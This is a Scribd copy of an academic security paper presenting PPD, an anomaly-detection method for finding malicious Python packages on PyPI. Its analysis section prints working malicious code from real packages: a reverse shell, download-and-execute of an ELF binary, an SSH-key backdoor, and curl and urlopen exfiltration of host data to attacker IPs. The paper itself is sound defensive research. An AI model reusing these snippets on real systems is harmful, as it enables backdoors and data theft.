0% found this document useful (0 votes)
41 views8 pages

Malicious Packages Lurking in User-Friendly Python Package Index

The document discusses the rise of malicious packages in the Python Package Index (PyPI) and introduces the Pip Poisoning Detector (PPD), an anomaly detection approach designed to identify suspicious and malicious packages. The authors analyzed over 228,000 packages, identifying 63 malicious and 238 suspicious ones, while significantly reducing the manual review workload. The paper highlights the effectiveness of PPD compared to existing detection methods and outlines the methodology used for package behavior analysis.

Uploaded by

sleepy.bear.iv
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
41 views8 pages

Malicious Packages Lurking in User-Friendly Python Package Index

The document discusses the rise of malicious packages in the Python Package Index (PyPI) and introduces the Pip Poisoning Detector (PPD), an anomaly detection approach designed to identify suspicious and malicious packages. The authors analyzed over 228,000 packages, identifying 63 malicious and 238 suspicious ones, while significantly reducing the manual review workload. The paper highlights the effectiveness of PPD compared to existing detection methods and outlines the methodology used for package behavior analysis.

Uploaded by

sleepy.bear.iv
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

2021 IEEE 20th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom)

2021 IEEE 20th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom) | 978-1-6654-1658-0/21/$31.00 ©2021 IEEE | DOI: 10.1109/TRUSTCOM53373.2021.00091

Malicious Packages Lurking in User-Friendly


Python Package Index
Genpei Liang∗ , Xiangyu Zhou∗ , Qingyu Wang∗ , Yutong Du∗ , Cheng Huang∗†
∗ School of Cyber Science and Engineering, Sichuan University, Chengdu, China
† Corresponding author, Email: [email protected]

Abstract—Python has gradually become one of the most im- 400 days and have been downloaded more than 1,000 times
portant programming languages through artificial intelligence’s [2]. Therefore, since the discovery of this poisoning method
development. PIP, a package management tool for Python, offers several years ago, the number of such attacks has increased
one-click installation, allowing developers to utilize other people’s
code to speed up development. However, any registered member exponentially [5]. For instance, MALOSS [2] identified 339
can easily upload packages to the repository that stores third- malicious packages in August 2019 after detecting more than
party packages. This functionality is used by attackers to poison one million packages in NPM, PyPI, and RubyGems. Three of
the package index, i.e., to publish enormous malicious pip these malicious packages with more than 100,000 installations
packages for installing backdoor, gathering information, etc. were assigned CVE numbers. In December 2020, Tencent [6]
To know the situation of third-party packages in the Python
community ecosystem, we establish the criteria for judging reported that PyPI was poisoned by malicious packages covd.
packages’ suspicious or malicious behavior by analyzing the code Attackers uploaded the package covd with a similar name to
logic in disclosed malicious packages. With the gained findings, the package covid into PyPI. Then they could compromise
we propose and implement Pip Poisoning Detector (PPD), an the infected host and perform a series of activities, such as
approach based on anomaly detection. PPD evaluated 228,723 planting Trojans and installing backdoors.
packages, and after human inspection, we found 63 malicious
and 238 suspicious ones among the output 5,699 results. The Current detection methods include detection of combosquat-
experimental results prove that our approach is effective and ting and typosquatting-attacks [7], metadata analysis combined
can significantly reduce review workload by 97.51%. with static and dynamic analysis [2], and pure static analysis
Keywords—pip poisoning, anomaly detection, malicious Python [8], etc. These approaches have their own advantages and dis-
advantages. For example, MALOSS has a high accuracy rate,
but it needs to create instances when detecting each package,
I. I NTRODUCTION which consumes huge computing resources. In particular, it
In recent years, Python is growing fast as the favorite will take a lot of resources to detect all packages across the en-
language for software developers. According to the world’s tire community ecosystem. By manually analyzing dozens of
most popular programming language ranking data published disclosed malicious packages, we find that malicious packages
by the TIOBE website [1], Python has rapidly overtaken C++ perform differently from benign packages in certain aspects
and C# from the 5th position in 2015 to the 3rd position (malicious packages usually steal personal data from users and
in 2020. Python is extremely popular among programmers, upload it to remote server, or download Trojans for execution,
owing to the powerful Python Package Index (PyPI). PyPI etc.). From this perspective, we propose a detection approach
is the authoritative index of all Python packages, and the for pip poisoning that combines static analysis and anomaly
accompanying repository is open to all registered members detection, PPD.
[2]. For developers, some reusable codes needed in the project To illustrate our approach, take the malicious pip package
has been already packaged by others. So they can easily and request as an example, which was uploaded to PyPI by
efficiently use these codes by executing a single command (e.g. attackers in July 2020 [9]. When end-users incorrectly type the
pip install request) [3]. Package Installer for Python (PIP) is command pip install request (correctly, pip install requests),
an official package management tool provided by Python for it automatically executes the code in setup.py (the entry file
downloading third-party packages in PyPI, and its installation for installation process), which will download a Trojan from
steps are shown in Figure 1. This quick installation does the remote server and execute it. Specifically, setup.py imports
help improve development efficiency. But PyPI is open, which a function license check() from another file hmatch.py. This
means that attackers can easily upload malicious packages to function is added to the original file by attackers for down-
launch supply chain attacks. Such an attack targeting the PyPI loading Trojans and installing backdoors. Current approaches
ecosystem is known as pip poisoning. do not inspect these imported codes, they only focus on the
The same situation is also happening in other community contents in setup.py. Our approach, PPD, uses the abstract
ecosystems with Npm for Nodejs [4], RubyGems for Ruby. syntax tree to parse setup.py, fetching all the imported codes
However, due to the registry’s ignorance of such attacks, this and joining them into setup.py after formatting it correctly to
situation has become more serious. About 20% of malicious form the completed installation code.
packages have survived in the package index for more than We mainly make the contributions as follows:

2324-9013/21/$31.00 ©2021 IEEE 606


DOI 10.1109/TrustCom53373.2021.00091
Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
al., Taylor et al.’s approach reduces the false-positive results to
some degree, but still does not perform a code level analysis.
Code checking. Ohm et al. [11] focused on the iteration
process of package versioning, i.e., the changes between
benign and malicious versions of the same package. Because
the malicious version will import much extra code compared to
the benign version. This is indeed a research field for package
security. But for malicious packages uploaded to the repository
for the first time, the code is malicious even if iterative versions
exist. In this case, this solution cannot determine whether the
package is malicious by comparing the two different versions.
Duan et al. [2] and Vu et al. [12] characterize the package
in a multidimensional manner. Duan et al. systematically
Figure. 1: The steps of installing a package via PIP investigated supply chain attacks in the package manager
ecosystem and proposed a large-scale analysis pipeline for
detecting malicious packages, MALOSS. The framework of
• After analyzing dozens of disclosed malicious pip pack- MALOSS combines static analysis, dynamic analysis and
ages, we have established preliminary criteria for judging metadata analysis, but the resource costs are expensive. This
the suspicious or malicious behavior of packages. is because that the volume of the entire package community is
• We propose and implement PPD, which not only proves rapidly increasing. MALOSS will create a container instance
the feasibility of the anomaly detection concept in in- when analyzing a single package. When it comes to inspecting
specting the entire PyPI ecosystem but also significantly the entire ecosystem, the resource costs are unacceptable(with
reduces the workload of manual review by 97.51%. 20 local workstations and a 60TB network-attached storage).
• We have found 301 suspicious or malicious packages Vu et al. detected the presence of injected code at both the
from the entire PyPI ecosystem, including 63 malicious file level and the code level, mainly by comparing files in a
packages and 238 suspicious packages. Part of these package repository (e.g., PyPI) with those in a source code
packages still exist in PyPI. repository (e.g., Github). However, this approach can only
The remainder of this paper is structured as follows. Section detect those packages that have corresponding repositories,
II provides related work. Existing threat models are presented which will lead to many misses.
in Section III. Section IV details the methodology and our Clustering. Different from the above, Garrett et al. [13]
model design. Subsequently, our results are described in proposed an anomaly detection-based approach for the Npm
Section V. We conclude this paper and provide an outlook ecosystem. This approach combined code features and meta-
for future work in Section VI. data features to identify suspicious updates. But as it detected
only a fraction of the ecosystem, the clustering is not effective.
II. R ELATED W ORK In addition, only caring about the package updates does reduce
the cost of detection. For those malicious packages that are
Many researchers have investigated this poisoning attack uploaded for the first time, this is what they expect.
against open source library from several aspects. In summary, current approaches are as follows. Package
Package name. Both Vu et al. [7] and Taylor et al. name analysis methods easily produce false-positive results.
[10] have conducted studies for package names. Vu et al. Code checking approaches consume huge resources and are
determined the naming pattern of packages in PyPI, and then unsuitable for the package manager to monitor the ecosystem
judged packages’ suspiciousness depending on whether the in real-time. Clustering approaches only clustered and ana-
Levenshtein distance for each pair of package names was less lyzed some packages in the community, which is not effective.
than or equal to the threshold value. Although this method,
which relies only on package names, is fast, its lack of support III. THREAT MODEL
from the code content makes it easy to produce false-positive In this section, we mainly describe some scenarios in which
results. Specifically, in their approach, the suspiciousness of users are vulnerable to attacks, as well as the suspicious and
a package depends on whether its name and its repository malicious behaviors of packages under our definition.
name are equal. So attackers can bypass this detection by
creating a GitHub repository with the same name in advance. A. Main Attack Vector
Taylor et al. conducted further experiments on Levenshtein Author account compromise. Package maintainers or au-
distance and proposed six similarly naming signals (triggering thors occasionally reuse the same passwords between several
any signal would then be recognized as similar). In addition, different sites, and some third-party sites with poor security are
they added package popularity assessment to package name likely to leak these passwords. Attackers can steal the author’s
similarity checking, where the major basis is the number of account through social engineering, password cracking, etc.
downloads. Compared with the approach proposed by Vu et After successfully compromising an account, attackers will

607

Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
distribute a version containing malicious code to end-users. An • De-obfuscate codes and then execute them. Attackers
example of such attack is eslint-scope [14], where the attacker often bypass security detection through obfuscation, but
compromised the ESLint maintainer’s account and published to achieve their goal they must de-obfuscate and execute
a malicious version of eslint-scope to the package registry. the code.
Publishing malicious packages. Attackers can easily pub- • Obvious malicious code or backdoors. Such as deleting
lish packages containing malicious code to the registry because the current work directory, shutting down the power, etc.
PyPI is open to registered members. Usually, attackers use
names that are similar to popular packages to mislead end- IV. M ETHODOLOGY
users to download and install their packages. Typical examples Based on relevant studies, we propose a pip poisoning
are jeIlyfish (a misspelling of jellyfish) and python3-dateutil detection methodology according to the Levenshtein distance
(an imitator of the popular package dateutil) [15]. Surprisingly, of package names, and features extracted from the source
jeIlyfish existed in PyPI for almost one year until it was code. The implementation is divided into three parts: data
discovered by security researchers. pre-processing, feature extraction as well as model training
Dependency confusion. Internal projects usually use stan- and result outputs, as illustrated in Figure 2. In the data pre-
dard, trusted code dependencies located in private reposito- processing part, we split all packages into two types depending
ries. However, if attackers create similar packages in public on their suffix names. The entry file for tar.gz is setup.py,
repositories, which have the same names as the private and while that for zip and whl is init .py or package-name.py
legitimate code dependencies, the malicious code can easily (package-name means package’s name). We parse the entry
get into these projects [16]. Eventually, these malicious codes file and get its imports. Then we traverse the entire package
will follow these normal projects to end-users. according to these imports and stitch the imported code into
the entry file. After getting the complete installation code, the
B. Package Behaviors process enters into the feature extraction part. We use the ab-
The above attack scenarios ultimately are designed to let stract syntax tree (AST) to parse the source code, accompanied
end-users execute the malicious code, and setup.py is the file by regular expressions (RegExp) to extract features. In this
most likely to be manipulated by attackers [12]. Therefore, We way, we solve the inefficiency of AST and the inaccuracy of
categorize the package behaviors as suspicious behaviors and RegExp. The complete feature set consists of code features and
malicious behaviors. Levenshtein distances of package names. Then we feed this
Suspicious behaviors. The following behaviors should be feature set to the third part, which outputs the final results
categorized as suspicious and should be verified subsequently. after reserve cross-validation and model training. After de-
duplication of these results, we obtain the packages that need
• An external file (.sh or .exe) is executed in the code,
manual review.
and we do not care whether these executable files are
malicious or not. A. Data Collection and Pre-Processing
• Many obfuscated characters are included in the code, and
This subsection explains how to build the experiment data
we do not care whether these characters are malicious or
and extract the complete installation code.
not after de-obfuscation.
Data collection. All the data in this paper are collected
• The code has the behavior of downloading remote re-
from PyPI and Tsinghua University’s PyPI mirror site. Firstly,
sources to the local environment and decompressing
we fetch the index file containing all package names and
them, and we do not care whether these resources are
crawl every package’s metadata according to this file. The
malicious or not.
crawling procedure uses multi-threading techniques to speed
• The code has the behavior of reading files and then
up metadata fetching. Then we normalize the metadata of each
executing them, and we do not care whether the contents
package to extract the download link for the latest version.
of these files are malicious or not.
When all packages are downloaded, we extract setup.py from
• The code has the behavior of editing system configuration
the tar.gz packages, and init .py or package-name.py from
files or opening services privately, and we can only
the zip and whl packages. Finally, we get the entry file of every
determine that it is suspicious.
packages.
Malicious behaviors. The following behaviors should be Pre-processing. For the entry file (e.g., setup.py for tar.gz),
directly categorized as malicious. we first use AST to parse the file. This file is the entrance for
• Make external requests to download files and then execute the whole pip installation process, it must be parsable by AST.
them. If the file is merely downloaded or executed, it can After traversing the entire tree node, we pick out the Import
only be considered suspicious. and ImportFrom child nodes, and then get all the imports from
• Create a reverse shell. Reverse shell is hard to discover, them. Following this, we compare these imports with Python’s
and attackers often use it to remotely control targets. built-in libraries to find out third-party imports. Finally, we
• After reading local sensitive data, send these data to a traverse the entire package and try to find files that match
remote server. The ultimate goal of attackers launching a these third-party imports, and then merge these files and the
series of attacks is to access user’s data. entry file to build the complete installation code.

608

Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
Figure. 2: The structure of our methodology

B. Features Extraction Linux and Windows (e.g., /etc/passwd, c:/windows/win.ini),


In the feature extraction part, we mainly explain the features and then detect whether these files are read. In the file manip-
that we have selected and the reasons for them. The features ulation scenario, we detect whether file IO related functions
are divided into two main categories, one is package features are called (e.g., f.read()). In the compression and decom-
and the other is code features. pression scenario, we match compression and decompression
Package features. We crawl the metadata of each package related libraries (e.g., zlib, tarfile). In the obfuscation and de-
in PyPI, including package name, latest upload timestamp, obfuscation scenario, we match obfuscation related libraries
first upload timestamp, number of versions, README length, (e.g., base64). In the importing other files scenario, we get
etc. However, the experimental results were poor, with only the names of third-party libraries based on the collected set of
50 of 4,934 packages output being defined as suspicious or built-in libraries, and find the full code of setup.py according
malicious after manual review. Using high latitude features can to these names. In the longest string scenario, we fetch the
lead to poor model performance because some unimportant longest string in the entire code and then check if it is a base64
features can become noisy and affect the model output. Thus, string. In the IP or URL scenario, we detect the presence of
we finally select only the package name’s Levenshtein distance strings shaped like IP or URL. In the fields of entry points
as package feature, mainly because it can quickly detect scenario, we check for the presence of the auto-install section.
attacks launched against developers’ misspellings. Vu et al. To summarize, during feature extraction, PPD will first parse
[7] give a Levenshtein threshold d = 2 in their research, the imported contents of the installation code through AST
setting from the dimension of package name inconsistency. In and then retrieve the existence of these dangerous functions.
addition, we add a similarity limit on the dimension of package If AST parsing fails, RegExp will be used to retrieve them. In
name consistency and set its threshold to 0.8 (massive under some feature extraction processes, such as the longest string,
reporting when setting 0.9). we directly used RegExp. Because of the efficiency issue, we
Code features. We have analyzed the PyPI portion of the do not use the token after AST parsing.
malicious package dataset collected by Ohm et al. [17] For
consistency in our analysis, we only choose the latest versions C. Detection Model
of these packages and then use them to construct our code
feature set, as shown in Table I. We have mined some of the Algorithm. The challenge is to discover those unknown
APIs that will be used in these attack scenarios. As shown in malicious packages in the whole PyPI ecosystem. Since few
Table II, we will illustrate the command execution and external malicious packages have been disclosed (only several dozens),
connection scenarios in detail. In the command execution sce- we have to confront a dilemma of extreme imbalance of
nario, we have divided all common dangerous functions into samples (more than 250,000 packages in total). We need to
built-in functions (e.g., os.system()) and third-party functions find malicious samples from a large number of unlabeled
(e.g., pexpect.spawn()). In the external connection scenario, samples, i.e., we need to make determinations about the
we divided all libraries into built-in libraries (e.g., httplib) and packages (benign packages or malicious packages) in the PyPI
third-party libraries (e.g., requests) depending on the version ecosystem. In the distance analysis-based anomaly detection
of the python interpreter. In the directory traversal scenario, we algorithm, the data is first assumed to obey a probability
detect whether some common functions that enumerate direc- distribution, and then a new sample will be introduced. If
tories are called (e.g., os.walk()). In the sensitive file reading the probability of this sample is less than a threshold, it
scenario, we count the paths of some configuration files under is determined to be an anomaly sample (malicious sample).

609

Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
TABLE I: The code features we picked and why we picked
5,987
them 6,000

Feature Name Description


Attackers often execute some system commands 5,000
Command execution
directly.
Attackers often send external connection to their
External connection

LmK#2` Q7 S+F;2b
pre-prepared servers. 4,000
Attackers often obtain directory information on
Directory traversal
the target.
File manipulation Attackers often upload, download or modify files. 3,000
Attackers often read sensitive files on the
Sensitive file reading
target. 2,120
Attackers often download and decompress 2,000
Compression and
malicious files, or compress local files in order
decompression
1,078 1,197
to send them to a remote server.
Attackers often obfuscate malicious code to 1,000 955 949
Obfuscation and 807
bypass detection and then de-obfuscate it for 467
de-obfuscation 419
execution. 167
Attackers often import some external files to 0
Importing other files bypass the methodology that only detects
setup.py.
y@N Ry@RN ky@kN jy@jN 9y@9N 8y@8N ey@eN dy@dN 3y@3N Ny@NN
The longest string The obfuscated code is often very long.
*Q/2 G2M;i?
Attackers often embed their IP or URL address
IP or URL address
in malicious code.
Attackers often use entry points to execute Figure. 3: Setup.py code length distribution (Unit: characters)
Fields in entry points
malicious code in a covert way.

TABLE II: Specific ground-truth in feature selection training data. Specifically, iForest recursively and randomly
(a) Command execution (b) External connection splits the dataset until all sample points are isolated. Under
Type Function
this random splitting strategy, the anomaly points usually have
Type Version Libraries
Built-in os.system() Built-in python2.x httplib short paths. Since iForest uses segmentation to isolate anomaly
os.popen()
urllib points instead of excluding them by describing normal points,
os.exec*()
os.spawn*() urllib2
subprocess.Popen() socket this almost eliminates the need to predefine the probability
subprocess.getoutput() python3.x http.client
subprocess.getstatusoutput() urllib distribution of normal samples, which solves the third problem.
subprocess.call()
subprocess.run()
urllib3 But the results are still influenced by potentially malicious
socket
subprocess.check call()
commands.getstatusoutput() 3rd-party all version requests packages to some extent because many malicious samples
commands.getoutput() aiohttp aggregated in a small sample size may lead to false-positive.
3rd-party pexpect selenium
Reverse cross-validation. Even if we have solved almost
all the problems above, just relying on the iForest model is
However, the following problems are often encountered when not enough to detect malicious packages from PyPI. When di-
doing anomaly detection. viding the training and test sets, we cannot guarantee whether
P1: When the dimensions of the features are large, a huge there are potentially malicious packages in the training set. To
dataset is required. Because of the large number of packages some extent, this will affect the final results. Thus, we use
in the PyPI ecosystem (258,426 in October 2020), we can a method called reverse cross-validation (RCV) [21]. Taking
build a huge dataset. 3-fold RCV as an example, we divide all the dataset into
P2: Some samples in low-density areas will be mis- three parts, with one part as the training set and another two
classified as abnormal samples. We traverse packages with parts as the test set, and then perform cycle training. RCV
code length less than 100 characters in intervals of 10 and selects only one part as the training set, which avoids false-
obtained their distribution, as shown in Figure 3. Packages negative caused by learning the wrong cases and improves the
with code lengths of 10 or less account for 43% of the detection accuracy rate. But at the same time, it increases the
total, and these codes we can tell at a glance whether they false-positive rate due to the reduction of the training set. To
are malicious or not. Therefore, we excluded these packages. improve the detection accuracy and reduce the false-positive
In addition to excluding packages with short codes, we also rate, we used 3-fold, 5-fold and 10-fold RCVs to process the
exclude packages for which we cannot access the code, such dataset. Finally, we de-duplicate the training output to get the
as packages that have been withdrawn or removed by their final result.
authors. V. E XPERIMENTAL
P3: Pre-assumed probability distributions strongly influ-
A. Results Overview
ence model performance. We pick the Isolated Forest (iForest)
algorithm [18], which has been widely used in many fields, We used a local computer running Windows 10 with 16GB
such as docker container anomaly monitoring [19], detection memory and 8 x 2.80GHz Intel CPUs to crawl the entire
of covert data integrity assault [20]. iForest as an unsupervised PyPI ecosystem in December 2020 (totally 287,915 packages),
anomaly detection method is well suited to the challenge we but only 228,887 packages we got the download link in the
encountered: it is insensitive to noise or anomalies in the index and downloaded them. Part of the reason is that it takes

610

Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
time for the crawler to download all packages. During this (One-Class SVM) model which is also an anomaly detection.
time between when we count the package name and when we But OCSVM needs to describe the normal samples, and
download it, the author could remove or withdraw the package. if the normal samples are mixed with malicious samples
The other part is because the package name exists in PyPI, but it will seriously affect its output. Eventually, the OCSVM
PyPI does not provide a link to its download (e.g., 01changer, model only verified 11 packages successfully, accounting for
2013007-pyh, and other packages in https://pypi.org/simple/). 26.82%. We categorize all detected packages by the behavioral
Then we extract the complete installation code of the entry classification in the subsection III-B and analyze the most
file, including the functions or imported files. After filtered typical packages as in Table III.
the previously mentioned packages which need to be excluded,
we detected the remaining 228,723 pip packages and obtained TABLE III: Verification of typical malicious pip packages
5,699 anomaly samples after de-duplication. Through the Package Name Description Hit or not
manual review, 301 packages with malicious or suspicious Steal sensitive files
behavior are found (63 malicious, 238 suspicious). The distri- such as SSH and GPG keys
jeIlyfish yes
and send them to the
bution of different types of malicious packages we found is attacker’s server.
shown in Figure 4. trustypip,
Creating a reverse shell. yes
pwniepip
Stealing sensitive information
request and digital currency keys, yes
planting persistent backdoors, etc.
Get the malicious script from
libpeshka the remote server and execute it, yes
then persist it in .bashrc.

C. Analysis of malicious packages in the wild


In this subsection, we take the malicious packages we
found in the whole PyPI ecosystem as examples and explain
why PPD can detect them. We have listed some of the most
representative malicious pip packages and analyzed their code
flow.
wormtongue. There are obvious malicious behaviors in
wormtongue’s code. This package will create a reverse shell to
185.238.32.160:10000 during installation, as shown in Listing
Figure. 4: Different types of malicious packages’ distribution 1. Other packages that obviously conduct malicious behaviors
like this are fakessh, suicide, etc.
In addition, we find out two hacking tools (revshell and print-structures. print-structures will download an elf to
exp10it) in the result outputs. These hacking tools often the local environment from a remote server, add executable
contain many dangerous operations such as code execution, permissions to it via the command chmod, and then execute
external connections, downloading files and executing them, it, as shown in Listing 2. This type of attack, downloading
so they can be detected by our methodology. Trojans and installing backdoors, is one of the most common.
And attackers often clear the files after execution to remove
B. Verification of known malicious packages
traces.
We have validated our methodology by using a dataset of protobuff . The cmdclass field in protobuff defines the class
53 malicious pip packages collected by Ohm et al. [17] and that will be instantiated when installing, and the installation of
several malicious packages [6], [9] disclosed by security ven- this class will trigger malicious function do thing(), as shown
dors. After manually reviewing these malicious pip packages, in Listing 3. This function executes a series of commands to
we exclude the following types of packages: get the host information and insert the attacker’s ssh public
1) No installation-related code in the package. key into the ssh configuration file. Finally, all the information
2) Incomplete setup.py code, which has only one function is uploaded to http://83.97.20.215/stats.php via curl.
3) Only a screenshot of the malicious code segment, not
the full code. Listing 1: Malicious code of wormtongue
We extract the features of the remaining 41 malicious 1 import socket, subprocess , os
2 s=socket.socket(socket.AF_INET ,socket.SOCK_STREAM)
packages and add them to the database. These malicious 3 s.connect(( ” 1 8 5 . 2 3 8 . 3 2 . 1 6 0 ” ,10000))
packages will be detected together with all packages in PyPI. 4 os.dup2(s.fileno(),0)
5 os.dup2(s.fileno(),1)
We verify that the name of the malicious package appears in 6 os.dup2(s.fileno(),2)
the results. In the end, 34 packages are detected, accounting 7 p = subprocess.call([ ” / b i n / s h ” , ” − i ” ])
for 82.93%. Meanwhile, we compare the effect of the OCSVM

611

Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
Listing 2: Malicious code of print-structures tst-conan. tst-conan first fetches the username, hostname,
1 def run(self): system version and other information, then determines whether
2 os.system( ’ w g e t h t t p : / / 1 1 8 . 1 2 8 . 1 3 4 . 4 5 : 8 0 0 9 / the operating system is Windows or Linux, and gets the
g e t s h e l l . e l f ’)
3 os.system( ’ chmod + x . / g e t s h e l l . e l f ’ ) system language. Finally, it gets the IP address by DNS query
4 os.system( ’ . / g e t s h e l l . e l f & ’ ) and merges it with the information obtained earlier before
5 os.remove( ’ . / g e t s h e l l . e l f ’ )
sending it to http://139.199.57.156/tst.php, as shown in Listing
4. Malicious packages similar to tst-conan and disclosed by
Listing 3: Malicious code of protobuff Ohm et al. [17] include PyYAML, pythom-mysql, python-
1 def do_thing(): openssl, etc.
2 returncode = os.system("""
3 { reque6t. reque6t is a malicious package released into the
4 EXTERNAL_IP=$(curl https://ipinfo.io/ip) PyPI ecosystem by security researchers, and similarly we
5 ALL_IPs=$(dnsdomainname -A)
6 ALL_HOSTNAMEs=$(dnsdomainname -I) also found r-quest, req-est, etc. The setup.py code of this
7 ALL_DOMAINs=$(grep "server_name" -ri /etc/nginx/ package first tries to create a file called pwn3d.txt in the root
sites-enabled/ * ; grep "ServerName" -ri /etc/
apache2/sites-enabled/ * ) directory to determine if it has root privileges. Then it sends
8 LINUX_INFO=$(uname; uname -or; lsb_release -irc) information about whether it is running with high privileges,
9 ENCODED_RESULT=$(echo "${USER}|||${USERNAME}|||$
{EXTERNAL_IP}|||${ALL_HOSTNAMEs}|||${ALL_IPs package name, package manager, etc. to http://mf2pru.ceye.io,
}|||${ALL_DOMAINs}|||${LINUX_INFO}" | base64 as shown in Listing5. Finally, it also tries to read /etc/passwd
)
10 and /etc/passwd.
11 echo "ssh-rsa AAA... user@host" >> ˜/.ssh/ afgcrk. afgcrk loads Python code objects via marshal
authorized_keys
12 curl --data payload="protobuff˜˜˜${ and then performs malicious actions after obfuscation using
ENCODED_RESULT}" "http://83.97.20.215/stats. lambda functions. Packages such as crkpak, crkpk, etc. are
php"
13 } similar to this. Although the specific implementation is differ-
14 &> /dev/null ent, the behavior of these malicious pip packages is to load
15 """);
Python code object and execute it, the codes are shown in
Listing 6.
Listing 4: Malicious code of tst-conan
1 def checkVersion(): D. Discussion
2 user_name = getpass.getuser()
3 hostname = socket.gethostname() Our approach can help PyPI package manager to mitigate
4 os_version = platform.platform() the cost of manual review to some extent. We reduce the
5 ip = [(s.connect(( ’ 8 . 8 . 8 . 8 ’ , 53)), s.getsockname
()[0], s.close()) for s in [socket.socket( number of packages to be inspected from more than 220,000
socket.AF_INET , socket.SOCK_DGRAM)]][0][1] to just over 5,600. If we consider the entire PyPI ecosystem
6 package= ’ t s t c o n a n ’
7 vid = user_name+ ” # # # ” +hostname+ ” # # # ” +os_version+ for inspection, our approach will reduce the work by 97.51%.
” # # # ” +ip+ ” # # # ” +package In terms of the results, our approach is effective for fully
8 request.urlopen( r ’ h t t p : / / 1 3 9 . 1 9 9 . 5 7 . 1 5 6 / t s t . p h p ’
,data= ’ v i d = ’ .encode( ’ u t f −8 ’ )+base64. functional malicious pip packages. But after analysis, we
b64encode(vid.encode( ’ u t f −8 ’ ))) found that our approach does not work well for detecting some
malicious PyPI packages with less function, such as 00000a.
Listing 5: Malicious code of reque6t In this package, only one external connection behavior and
1 def telemetry(is_sudo , sender , original_name , one ls command are used.
new_name): In addition, during our manual review of the 301 packages
2 url = ” h t t p : / / m f 2 p r u . c e y e . i o ”
3 data = encoder(dict( output, we notice that: 81 of the 238 suspicious packages have
4 is_sudo=is_sudo , the behavior of reading files and executing them, while 77
5 sender=sender,
6 original_name=original_name , packages have the behavior of downloading files. Although
7 new_name=new_name , these packages execute seemingly normal files like version.py,
8 version=sys.version
9 )) the act of reading files and executing them should not be
10 request(url, encode(data), timeout=0.1) allowed. Because end-users cannot determine whether these
files are required for the installation or are carefully forged
Listing 6: Malicious code of afgcrk by the attacker. As for the files downloading, these third-
1 exec marshal.loads( ’ c \ x 0 0 . . . \ x 0 c \ x 0 1 ’ ) party packages should have complete code and not need to
2 z = [168, 171...,214, 222]
3 _ = [103, 66...,4, 34]
download something else in the background. This behavior
4 __ = [927..., 927] should also be disallowed because there is no way for end-
5 OoO_ = [45, 42...,39, 41]
6 exec marshal.loads( ’ c \ x 0 0 . . . \ x 0 c \ x 0 1 ’ )
users to ensure the files’ security. The two cases mentioned
7 OO = lambda _ : marshal.loads(_) above are the most frequent ones, and we call on PyPI officials
8 u = ( ( { } < ( ) ) - ( { } < ( ) ) )
9 p = (({}<())-({}<()));v = []
to standardize the format of the setup.py file to disable silent
10 exec((lambda:((() >())+(() <()))).func_code. background downloads and other dangerous operations. A
co_lnotab).join(map(chr ,[(....])))
11 exec OO( ” ” .join([chr(i) for i in lx]).decode( ” h e x ”
reasonable approach would be to leave these operations to the
)) users instead of these third-party packages.

612

Authorized licensed use limited to: University of Skovde. Downloaded on February 02,2025 at 23:13:25 UTC from IEEE Xplore. Restrictions apply.
VI. C ONCLUSIONS AND FUTURE WORK R EFERENCES
A. Conclusions [1] I. TIOBE, “Tiobe index,” Retrieved from Tiobe Index:
https://www.tiobe.com/tiobe-index, 2020.
We crawl all packages in the PyPI ecosystem and pre- [2] R. Duan, O. Alrawi, R. P. Kasturi, R. Elder, B. Saltaformaggio, and
liminarily establish the criteria for judging the suspicious or W. Lee, “Towards measuring supply chain attacks on package managers
malicious behavior of packages by analyzing the behavioral for interpreted languages.” NDSS, 2021.
[3] I. Pashchenko, D.-L. Vu, and F. Massacci, “A qualitative study of de-
features of the disclosed malicious pip packages. We combine pendency management and its security implications,” in Proceedings of
two techniques, AST and RegExp, to extract code features and the 2020 ACM SIGSAC Conference on Computer and Communications
construct feature sets with package name features. Finally, by Security, 2020, pp. 1513–1531.
[4] M. Zimmermann, C.-A. Staicu, C. Tenny, and M. Pradel, “Small world
using the iForest algorithm that performs well under multi- with high risks: A study of security threats in the npm ecosystem,” in
dimensional features, we find some malicious pip packages 28th {USENIX} Security Symposium ({USENIX} Security 19), 2019,
lurking in the PyPI ecosystem. Although a limited number of pp. 995–1010.
[5] A. Almubayed, “Practical approach to automate the discovery and
malicious pip packages are detected, we can prove that our eradication of opensource software vulnerabilities at scale,” Blackhat
approach works. We have analyzed the lifecycle of the pip USA, 2019.
installation process, which starts with a one-click command [6] T. S. R. C. Xnianq, “Pypi official repository is poi-
soned by covd malicious packages,” Retrieved from:
(e.g., pip install requests) entered by end-users. During the https://security.tencent.com/index.php/blog/msg/170, 2020.
process of collecting samples, we have found two types of [7] D.-L. Vu, I. Pashchenko, F. Massacci, H. Plate, and A. Sabetta, “Ty-
installation packages (tar.gz, whl/zip) in the PyPI ecosystem posquatting and combosquatting attacks on the python ecosystem,” in
2020 IEEE European Symposium on Security and Privacy Workshops
and proposed a solution to extract the complete setup.py code (EuroS&PW). IEEE, 2020, pp. 509–514.
for each of them. [8] M. Čarnogurskỳ, “Attacks on package managers.”
Following these findings, we propose and implement a pip [9] E. Debuggers, “Don’t pip install ”request” instead of ”requests”. it is
a trojan!” Retrieved from: https://ethicaldebuggers.com/dont-pip-install-
poisoning detection approach based on the iForest algorithm, request-instead-of-requests-it-is-a-trojan/, 2020.
